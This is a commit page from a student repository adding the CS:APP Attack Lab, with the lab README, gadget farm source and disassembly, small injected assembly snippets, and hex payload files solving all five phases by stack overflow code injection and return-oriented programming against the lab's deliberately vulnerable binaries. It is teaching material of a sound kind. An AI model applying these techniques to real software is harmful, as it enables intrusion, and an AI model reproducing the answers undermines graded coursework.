kagura/NJUPT-CSAPP
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Add attack lab

Browse source
This commit is contained in:
kagura 2024-06-12 23:13:45 +08:00
parent 3aeb42d256
commit df5d918a3c
27 changed files with 5914 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
AttackLab/backup/target26/README.txt Normal file
View file

@ -0,0 +1,28 @@
This file contains materials for one instance of the attacklab.
Files:
ctarget
Linux binary with code-injection vulnerability. To be used for phases
1-3 of the assignment.
rtarget
Linux binary with return-oriented programming vulnerability. To be
used for phases 4-5 of the assignment.
cookie.txt
Text file containing 4-byte signature required for this lab instance.
farm.c
Source code for gadget farm present in this instance of rtarget. You
can compile (use flag -Og) and disassemble it to look for gadgets.
hex2raw
Utility program to generate byte sequences. See documentation in lab
handout.

1
AttackLab/backup/target26/cookie.txt Normal file
View file

@ -0,0 +1 @@
0x54756825

BIN
AttackLab/backup/target26/ctarget Executable file
View file

Binary file not shown.

223
AttackLab/backup/target26/farm.c Normal file
View file

@ -0,0 +1,223 @@
/* This function marks the start of the farm */
int start_farm()
{
return 1;
}
unsigned getval_431()
{
return 3284634056U;
}
unsigned getval_265()
{
return 650363736U;
}
unsigned getval_230()
{
return 3347662929U;
}
void setval_118(unsigned *p)
{
*p = 3281031256U;
}
unsigned addval_306(unsigned x)
{
return x + 3284633928U;
}
unsigned getval_369()
{
return 2425444590U;
}
unsigned getval_305()
{
return 2496104776U;
}
void setval_403(unsigned *p)
{
*p = 2425394264U;
}
/* This function marks the middle of the farm */
int mid_farm()
{
return 1;
}
/* Add two arguments */
long add_xy(long x, long y)
{
return x+y;
}
unsigned addval_243(unsigned x)
{
return x + 2497743176U;
}
void setval_192(unsigned *p)
{
*p = 3676360329U;
}
unsigned getval_193()
{
return 3683962505U;
}
unsigned addval_372(unsigned x)
{
return x + 3676881545U;
}
void setval_496(unsigned *p)
{
*p = 3380920961U;
}
void setval_303(unsigned *p)
{
*p = 3677933960U;
}
void setval_299(unsigned *p)
{
*p = 3683962505U;
}
void setval_442(unsigned *p)
{
*p = 3285289317U;
}
unsigned getval_311()
{
return 3767093920U;
}
unsigned addval_462(unsigned x)
{
return x + 3524841097U;
}
unsigned addval_285(unsigned x)
{
return x + 398578057U;
}
unsigned addval_388(unsigned x)
{
return x + 2430634312U;
}
unsigned addval_323(unsigned x)
{
return x + 3224948361U;
}
void setval_415(unsigned *p)
{
*p = 3223375489U;
}
unsigned getval_449()
{
return 3232026249U;
}
unsigned getval_297()
{
return 3674263945U;
}
unsigned addval_409(unsigned x)
{
return x + 3529559689U;
}
void setval_456(unsigned *p)
{
*p = 3247493513U;
}
unsigned getval_459()
{
return 3769190406U;
}
unsigned addval_208(unsigned x)
{
return x + 3221803401U;
}
unsigned addval_346(unsigned x)
{
return x + 3771287598U;
}
void setval_387(unsigned *p)
{
*p = 2464188744U;
}
unsigned addval_238(unsigned x)
{
return x + 1103348361U;
}
void setval_274(unsigned *p)
{
*p = 3375415945U;
}
void setval_211(unsigned *p)
{
*p = 3229143433U;
}
unsigned addval_206(unsigned x)
{
return x + 2430634304U;
}
unsigned addval_267(unsigned x)
{
return x + 2430634312U;
}
void setval_216(unsigned *p)
{
*p = 2495777102U;
}
unsigned addval_380(unsigned x)
{
return x + 2428668189U;
}
void setval_250(unsigned *p)
{
*p = 3523789441U;
}
unsigned getval_411()
{
return 717472395U;
}
unsigned getval_374()
{
return 3676361096U;
}
/* This function marks the end of the farm */
int end_farm()
{
return 1;
}

BIN
AttackLab/backup/target26/hex2raw Executable file
View file

Binary file not shown.

BIN
AttackLab/backup/target26/rtarget Executable file
View file

Binary file not shown.

BIN
AttackLab/l2.o Normal file
View file

Binary file not shown.

3
AttackLab/l2.s Normal file
View file

@ -0,0 +1,3 @@
movq $0x54756825, %rdi
pushq $0x0401fa0
ret

BIN
AttackLab/l3.o Normal file
View file

Binary file not shown.

3
AttackLab/l3.s Normal file
View file

@ -0,0 +1,3 @@
movq $0x55638800, %rdi
retq

28
AttackLab/target26/README.txt Normal file
View file

@ -0,0 +1,28 @@
This file contains materials for one instance of the attacklab.
Files:
ctarget
Linux binary with code-injection vulnerability. To be used for phases
1-3 of the assignment.
rtarget
Linux binary with return-oriented programming vulnerability. To be
used for phases 4-5 of the assignment.
cookie.txt
Text file containing 4-byte signature required for this lab instance.
farm.c
Source code for gadget farm present in this instance of rtarget. You
can compile (use flag -Og) and disassemble it to look for gadgets.
hex2raw
Utility program to generate byte sequences. See documentation in lab
handout.

1
AttackLab/target26/cookie.txt Normal file
View file

@ -0,0 +1 @@
0x54756825

BIN
AttackLab/target26/ctarget Executable file
View file

Binary file not shown.

2473
AttackLab/target26/ctarget.txt Normal file
View file

File diff suppressed because it is too large Load diff

223
AttackLab/target26/farm.c Normal file
View file

@ -0,0 +1,223 @@
/* This function marks the start of the farm */
int start_farm()
{
return 1;
}
unsigned getval_431()
{
return 3284634056U;
}
unsigned getval_265()
{
return 650363736U;
}
unsigned getval_230()
{
return 3347662929U;
}
void setval_118(unsigned *p)
{
*p = 3281031256U;
}
unsigned addval_306(unsigned x)
{
return x + 3284633928U;
}
unsigned getval_369()
{
return 2425444590U;
}
unsigned getval_305()
{
return 2496104776U;
}
void setval_403(unsigned *p)
{
*p = 2425394264U;
}
/* This function marks the middle of the farm */
int mid_farm()
{
return 1;
}
/* Add two arguments */
long add_xy(long x, long y)
{
return x+y;
}
unsigned addval_243(unsigned x)
{
return x + 2497743176U;
}
void setval_192(unsigned *p)
{
*p = 3676360329U;
}
unsigned getval_193()
{
return 3683962505U;
}
unsigned addval_372(unsigned x)
{
return x + 3676881545U;
}
void setval_496(unsigned *p)
{
*p = 3380920961U;
}
void setval_303(unsigned *p)
{
*p = 3677933960U;
}
void setval_299(unsigned *p)
{
*p = 3683962505U;
}
void setval_442(unsigned *p)
{
*p = 3285289317U;
}
unsigned getval_311()
{
return 3767093920U;
}
unsigned addval_462(unsigned x)
{
return x + 3524841097U;
}
unsigned addval_285(unsigned x)
{
return x + 398578057U;
}
unsigned addval_388(unsigned x)
{
return x + 2430634312U;
}
unsigned addval_323(unsigned x)
{
return x + 3224948361U;
}
void setval_415(unsigned *p)
{
*p = 3223375489U;
}
unsigned getval_449()
{
return 3232026249U;
}
unsigned getval_297()
{
return 3674263945U;
}
unsigned addval_409(unsigned x)
{
return x + 3529559689U;
}
void setval_456(unsigned *p)
{
*p = 3247493513U;
}
unsigned getval_459()
{
return 3769190406U;
}
unsigned addval_208(unsigned x)
{
return x + 3221803401U;
}
unsigned addval_346(unsigned x)
{
return x + 3771287598U;
}
void setval_387(unsigned *p)
{
*p = 2464188744U;
}
unsigned addval_238(unsigned x)
{
return x + 1103348361U;
}
void setval_274(unsigned *p)
{
*p = 3375415945U;
}
void setval_211(unsigned *p)
{
*p = 3229143433U;
}
unsigned addval_206(unsigned x)
{
return x + 2430634304U;
}
unsigned addval_267(unsigned x)
{
return x + 2430634312U;
}
void setval_216(unsigned *p)
{
*p = 2495777102U;
}
unsigned addval_380(unsigned x)
{
return x + 2428668189U;
}
void setval_250(unsigned *p)
{
*p = 3523789441U;
}
unsigned getval_411()
{
return 717472395U;
}
unsigned getval_374()
{
return 3676361096U;
}
/* This function marks the end of the farm */
int end_farm()
{
return 1;
}

BIN
AttackLab/target26/farm.o Normal file
View file

Binary file not shown.

181
AttackLab/target26/farm.txt Normal file
View file

@ -0,0 +1,181 @@
farm.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <start_farm>:
0: b8 01 00 00 00 mov $0x1,%eax
5: c3 ret
0000000000000006 <getval_431>:
6: b8 c8 89 c7 c3 mov $0xc3c789c8,%eax
b: c3 ret
000000000000000c <getval_265>:
c: b8 58 c3 c3 26 mov $0x26c3c358,%eax
11: c3 ret
0000000000000012 <getval_230>:
12: b8 51 48 89 c7 mov $0xc7894851,%eax
17: c3 ret
0000000000000018 <setval_118>:
18: c7 07 58 90 90 c3 movl $0xc3909058,(%rdi)
1e: c3 ret
000000000000001f <addval_306>:
1f: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
25: c3 ret
0000000000000026 <getval_369>:
26: b8 ee 58 91 90 mov $0x909158ee,%eax
2b: c3 ret
000000000000002c <getval_305>:
2c: b8 48 89 c7 94 mov $0x94c78948,%eax
31: c3 ret
0000000000000032 <setval_403>:
32: c7 07 58 94 90 90 movl $0x90909458,(%rdi)
38: c3 ret
0000000000000039 <mid_farm>:
39: b8 01 00 00 00 mov $0x1,%eax
3e: c3 ret
000000000000003f <add_xy>:
3f: 48 8d 04 37 lea (%rdi,%rsi,1),%rax
43: c3 ret
0000000000000044 <addval_243>:
44: 8d 87 48 89 e0 94 lea -0x6b1f76b8(%rdi),%eax
4a: c3 ret
000000000000004b <setval_192>:
4b: c7 07 89 ce 20 db movl $0xdb20ce89,(%rdi)
51: c3 ret
0000000000000052 <getval_193>:
52: b8 89 ce 94 db mov $0xdb94ce89,%eax
57: c3 ret
0000000000000058 <addval_372>:
58: 8d 87 89 c2 28 db lea -0x24d73d77(%rdi),%eax
5e: c3 ret
000000000000005f <setval_496>:
5f: c7 07 81 c2 84 c9 movl $0xc984c281,(%rdi)
65: c3 ret
0000000000000066 <setval_303>:
66: c7 07 88 d1 38 db movl $0xdb38d188,(%rdi)
6c: c3 ret
000000000000006d <setval_299>:
6d: c7 07 89 ce 94 db movl $0xdb94ce89,(%rdi)
73: c3 ret
0000000000000074 <setval_442>:
74: c7 07 65 89 d1 c3 movl $0xc3d18965,(%rdi)
7a: c3 ret
000000000000007b <getval_311>:
7b: b8 a0 4a 89 e0 mov $0xe0894aa0,%eax
80: c3 ret
0000000000000081 <addval_462>:
81: 8d 87 89 ce 18 d2 lea -0x2de73177(%rdi),%eax
87: c3 ret
0000000000000088 <addval_285>:
88: 8d 87 89 d1 c1 17 lea 0x17c1d189(%rdi),%eax
8e: c3 ret
000000000000008f <addval_388>:
8f: 8d 87 48 89 e0 90 lea -0x6f1f76b8(%rdi),%eax
95: c3 ret
0000000000000096 <addval_323>:
96: 8d 87 89 ce 38 c0 lea -0x3fc73177(%rdi),%eax
9c: c3 ret
000000000000009d <setval_415>:
9d: c7 07 81 ce 20 c0 movl $0xc020ce81,(%rdi)
a3: c3 ret
00000000000000a4 <getval_449>:
a4: b8 89 ce a4 c0 mov $0xc0a4ce89,%eax
a9: c3 ret
00000000000000aa <getval_297>:
aa: b8 89 d1 00 db mov $0xdb00d189,%eax
af: c3 ret
00000000000000b0 <addval_409>:
b0: 8d 87 89 ce 60 d2 lea -0x2d9f3177(%rdi),%eax
b6: c3 ret
00000000000000b7 <setval_456>:
b7: c7 07 89 d1 90 c1 movl $0xc190d189,(%rdi)
bd: c3 ret
00000000000000be <getval_459>:
be: b8 06 48 a9 e0 mov $0xe0a94806,%eax
c3: c3 ret
00000000000000c4 <addval_208>:
c4: 8d 87 89 d1 08 c0 lea -0x3ff72e77(%rdi),%eax
ca: c3 ret
00000000000000cb <addval_346>:
cb: 8d 87 2e 48 c9 e0 lea -0x1f36b7d2(%rdi),%eax
d1: c3 ret
00000000000000d2 <setval_387>:
d2: c7 07 48 89 e0 92 movl $0x92e08948,(%rdi)
d8: c3 ret
00000000000000d9 <addval_238>:
d9: 8d 87 89 c2 c3 41 lea 0x41c3c289(%rdi),%eax
df: c3 ret
00000000000000e0 <setval_274>:
e0: c7 07 89 c2 30 c9 movl $0xc930c289,(%rdi)
e6: c3 ret
00000000000000e7 <setval_211>:
e7: c7 07 89 d1 78 c0 movl $0xc078d189,(%rdi)
ed: c3 ret
00000000000000ee <addval_206>:
ee: 8d 87 40 89 e0 90 lea -0x6f1f76c0(%rdi),%eax
f4: c3 ret
00000000000000f5 <addval_267>:
f5: 8d 87 48 89 e0 90 lea -0x6f1f76b8(%rdi),%eax
fb: c3 ret
00000000000000fc <setval_216>:
fc: c7 07 4e 89 c2 94 movl $0x94c2894e,(%rdi)
102: c3 ret
0000000000000103 <addval_380>:
103: 8d 87 1d 89 c2 90 lea -0x6f3d76e3(%rdi),%eax
109: c3 ret
000000000000010a <setval_250>:
10a: c7 07 81 c2 08 d2 movl $0xd208c281,(%rdi)
110: c3 ret
0000000000000111 <getval_411>:
111: b8 8b c2 c3 2a mov $0x2ac3c28b,%eax
116: c3 ret
0000000000000117 <getval_374>:
117: b8 88 d1 20 db mov $0xdb20d188,%eax
11c: c3 ret
000000000000011d <end_farm>:
11d: b8 01 00 00 00 mov $0x1,%eax
122: c3 ret

BIN
AttackLab/target26/hex2raw Executable file
View file

Binary file not shown.

BIN
AttackLab/target26/printf.so Normal file
View file

Binary file not shown.

8
AttackLab/target26/results/1.txt Normal file
View file

@ -0,0 +1,8 @@
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
6c 1f 40

8
AttackLab/target26/results/2.txt Normal file
View file

@ -0,0 +1,8 @@
48 C7 C7 25 68 75 54 68
A0 1F 40 00 C3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b8 87 63 55

12
AttackLab/target26/results/3.txt Normal file
View file

@ -0,0 +1,12 @@
48 c7 c7 08 88 63 55 c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b8 87 63 55 00 00 00 00
bf 87 63 55 00 00 00 00
bd 20 40 00 00 00 00 00
35 34 37 35 36 38 32 35
00

11
AttackLab/target26/results/4.txt Normal file
View file

@ -0,0 +1,11 @@
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
7b 21 40 00 00 00 00 00
25 68 75 54 00 00 00 00
86 21 40 00 00 00 00 00
a0 1f 40 00 00 00 00 00

18
AttackLab/target26/results/5.txt Normal file
View file

@ -0,0 +1,18 @@
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
4f 22 40 00 00 00 00 00
86 21 40 00 00 00 00 00
7b 21 40 00 00 00 00 00
48 00 00 00 00 00 00 00
c5 22 40 00 00 00 00 00
25 22 40 00 00 00 00 00
e3 21 40 00 00 00 00 00
cd 21 40 00 00 00 00 00
86 21 40 00 00 00 00 00
bd 20 40 00 00 00 00 00
35 34 37 35 36 38 32 35

BIN
AttackLab/target26/rtarget Executable file
View file

Binary file not shown.

2693
AttackLab/target26/rtarget.txt Normal file
View file

File diff suppressed because it is too large Load diff

BIN
AttackLab/target26/tmp Normal file
View file

Binary file not shown.